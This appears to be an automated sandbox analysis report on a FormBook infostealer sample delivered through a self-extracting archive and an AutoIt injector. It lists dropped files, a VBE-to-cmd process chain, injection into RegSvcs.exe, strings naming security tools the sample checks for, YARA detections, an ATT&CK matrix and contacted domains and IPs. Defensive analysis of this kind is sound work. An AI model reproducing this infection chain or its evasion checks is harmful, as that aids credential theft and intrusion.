                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chit8memstr_06ab7e68-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cessor_identifier=intel64 family 6 model 143 stepping 8, genuineintelprocessor_level=6processor_revision=8f08programdata=c:\programdataprogramfiles=c:\program files (x86)programfiles(x86)=c:\program files (x86)programw6432=c:\program filememstr_dc4f0b9c-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th=c:\ogram files (xmemstr_e76718ad-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er~ dmemstr_8c1afca1-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program files (x86)\autoit3\automemstr_20158be2-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (onnamemstr_3a501da8-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =csofxcmmemstr_e0f1cf3e-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ers\nsmemstr_177ef2df-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emc: 1'memstr_67ef2db1-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \a01'memstr_8873ae25-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ap@1'memstr_29ff2478-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_14532c85-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: software\microsoft\windows\currentversion\internet settings\zonemap\memstr_7a38a536-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: security manager&memstr_83792594-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menu cachememstr_3303a86b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\systemmemstr_0f614252-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: security managermemstr_30475b62-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseandcreateitemmemstr_ad09f475-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &ln0hmemstr_d921c539-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseoriginalitemmemstr_9a28c810-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #fn08memstr_2ff10566-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\usermemstr_3481e628-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sync root managermemstr_bb8eb270-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\usermsmemstr_ac9ec41e-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userw)memstr_088d9393-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_305e1cb8-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pce n'memstr_d7be9670-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mnmjgb.binmemstr_5c335d23-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 mnmjgb.binfmemstr_394a390d-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.vmemstr_125907ef-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nwlmhahq.dllmemstr_9300cc40-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 nwlmhahq.dlljmemstr_05717e30-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.6memstr_de501249-5
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEBB02 SendInput,keybd_event,8_2_00EEBB02
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEEBE5 mouse_event,8_2_00EEEBE5
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_00EE13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EE1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00EE1EF3
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007082000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196870409.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: avqj.mp2, 00000008.00000003.2325397298.000000000118E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: avqj.mp2Binary or memory string: Shell_TrayWnd
                Source: avqj.mp2, 00000008.00000002.2326853463.0000000001100000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2585498756.000000000112B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587062189.000000000112B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: avqj.mp2.exe, 00000014.00000003.3258521967.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258032251.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257469824.00000000019A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf/
                Source: avqj.mp2.exe, 00000014.00000003.2691887562.0000000001954000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Thensv
                Source: awggmrd.xls.0.dr, awggmrd.xls.8.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3128902063.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3112151550.00000000019FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managery

                Language, Device and Operating System Detection

                barindex
                Yara detected Autoit Injector
                Source: Yara matchFile source: Process Memory Space: avqj.mp2 PID: 2828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: avqj.mp2.exe PID: 6848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: avqj.mp2.exe PID: 4676, type: MEMORYSTR
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6694 cpuid 0_2_00CB6694
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CAFD34
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CB454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EDE5F8 GetUserNameW,8_2_00EDE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EBBCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00EBBCF2
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CA03BE GetVersionExW,0_2_00CA03BE
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: avqj.mp2.exe, 0000000F.00000003.2583976181.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587316445.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152493791.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3026066360.0000000001A72000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                Source: avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583976181.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587316445.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152493791.0000000001A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.exe
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: avqj.mp2Binary or memory string: WIN_81
                Source: avqj.mp2Binary or memory string: WIN_XP
                Source: avqj.mp2.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: avqj.mp2Binary or memory string: WIN_XPe
                Source: avqj.mp2Binary or memory string: WIN_VISTA
                Source: avqj.mp2Binary or memory string: WIN_7
                Source: avqj.mp2Binary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F02163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,8_2_00F02163
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F01B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,8_2_00F01B61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		2
                Valid Accounts                		1
                Native API                		1
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		21
                Input Capture                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol21
                Input Capture                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		2
                Obfuscated Files or Information                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                Software Packing                		NTDS27
                System Information Discovery                		Distributed Component Object ModelInput Capture1
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Registry Run Keys / Startup Folder                		11
                Masquerading                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                Process Injection                		Network Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586017 Sample: u549ed5dEA.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 68 www.supernutra01.online 2->68 70 www.127358.win 2->70 74 Suricata IDS alerts for network traffic 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 Yara detected Autoit Injector 2->78 80 8 other signatures 2->80 10 u549ed5dEA.exe 3 41 2->10         started        14 avqj.mp2.exe 1 1 2->14         started        16 avqj.mp2.exe 2->16         started        18 avqj.mp2.exe 2->18         started        signatures3 process4 file5 62 C:\Users\user\AppData\Local\Temp\...\avqj.mp2, PE32 10->62 dropped 64 C:\Users\user\AppData\Local\Temp\...\itdo.vbe, Unicode 10->64 dropped 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->92 20 wscript.exe 1 10->20         started        66 C:\Users\user\ruum\avqj.mp2.exe.exe, PE32 14->66 dropped 94 Writes to foreign memory regions 14->94 96 Allocates memory in foreign processes 14->96 98 Injects a PE file into a foreign processes 14->98 23 RegSvcs.exe 14->23         started        25 RegSvcs.exe 14->25         started        27 RegSvcs.exe 16->27         started        29 RegSvcs.exe 16->29         started        signatures6 process7 signatures8 82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->82 31 cmd.exe 1 20->31         started        33 cmd.exe 1 20->33         started        36 cmd.exe 1 20->36         started        process9 signatures10 38 avqj.mp2 1 38 31->38         started        42 conhost.exe 31->42         started        72 Uses ipconfig to lookup or modify the Windows network settings 33->72 44 conhost.exe 33->44         started        46 ipconfig.exe 1 33->46         started        48 conhost.exe 36->48         started        50 ipconfig.exe 1 36->50         started        process11 file12 56 C:\Users\user\ruum\avqj.mp2.exe, PE32 38->56 dropped 58 C:\Users\user\AppData\Local\...\avqj.mp2.exe, PE32 38->58 dropped 60 C:\Users\user\ruum\avqj.mp2, PE32 38->60 dropped 84 Found API chain indicative of sandbox detection 38->84 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 38->86 88 Writes to foreign memory regions 38->88 90 2 other signatures 38->90 52 RegSvcs.exe 38->52         started        54 RegSvcs.exe 38->54         started        signatures13 process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                u549ed5dEA.exe61%ReversingLabsWin32.Trojan.Runner

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp20%ReversingLabs
                C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2.exe0%ReversingLabs
                C:\Users\user\ruum\avqj.mp20%ReversingLabs
                C:\Users\user\ruum\avqj.mp2.exe0%ReversingLabs
                C:\Users\user\ruum\avqj.mp2.exe.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.127358.win
                		206.238.89.119
                		truefalse
                  		high
                  www.supernutra01.online
                  		188.114.96.3
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Ju549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196955869.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2586770726.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3151702741.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 00000014.00000000.2644570578.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drfalse
                      		high
